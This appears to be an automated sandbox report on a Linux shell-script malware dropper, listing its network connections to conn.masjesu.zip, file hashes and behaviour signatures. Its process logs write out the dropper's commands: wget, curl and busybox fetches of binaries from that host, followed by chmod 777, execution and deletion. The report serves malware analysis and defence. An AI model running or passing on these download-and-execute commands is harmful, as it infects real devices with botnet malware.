US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt

MD5 e1732e70f015e99d14dff1eeeaec9966
SHA1 c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA256 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA512 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-10 01:01

Reported

2024-11-10 01:04

Platform

debian9-mipsel-20240611-en

Max time kernel

150s

Max time network

45s

Command Line

[/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO N/A
N/A /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J N/A
N/A /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv N/A
N/A /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 N/A
N/A /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt N/A
N/A /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV N/A
N/A /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B N/A
N/A /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc N/A
N/A /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR N/A
N/A /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 N/A
N/A /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /usr/bin/curl N/A
File opened for modification /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /usr/bin/curl N/A
File opened for modification /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /usr/bin/curl N/A
File opened for modification /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 /usr/bin/curl N/A
File opened for modification /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y /usr/bin/curl N/A
File opened for modification /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J /usr/bin/curl N/A
File opened for modification /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /usr/bin/curl N/A
File opened for modification /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 /usr/bin/curl N/A
File opened for modification /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO /usr/bin/curl N/A
File opened for modification /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /usr/bin/curl N/A
File opened for modification /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /usr/bin/curl N/A

Processes

/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh

[/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/chmod

[chmod 777 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO

[./d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/bin/rm

[rm d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/chmod

[chmod 777 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J

[./b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/bin/rm

[rm b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/chmod

[chmod 777 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv

[./V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/bin/rm

[rm V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/chmod

[chmod 777 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3

[./trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/bin/rm

[rm trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/chmod

[chmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt

[./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/bin/rm

[rm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/chmod

[chmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV

[./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/bin/rm

[rm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/chmod

[chmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B

[./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/bin/rm

[rm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/chmod

[chmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc

[./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/bin/rm

[rm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/chmod

[chmod 777 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR

[./619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/bin/rm

[rm 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/chmod

[chmod 777 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5

[./pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/bin/rm

[rm pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/chmod

[chmod 777 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y

[./wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/bin/rm

[rm wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt

MD5 e1732e70f015e99d14dff1eeeaec9966
SHA1 c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA256 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA512 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-10 01:01

Reported

2024-11-10 01:04

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

149s

Max time network

131s

Command Line

[/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh]

Signatures

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh

[/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 N/A udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp
US 151.101.1.91:443 N/A tcp
GB 195.181.164.14:443 N/A tcp
GB 185.125.188.62:443 N/A tcp
GB 185.125.188.62:443 N/A tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-10 01:01

Reported

2024-11-10 01:04

Platform

debian9-armhf-20240418-en

Max time kernel

149s

Max time network

2s

Command Line

[/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh

[/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

N/A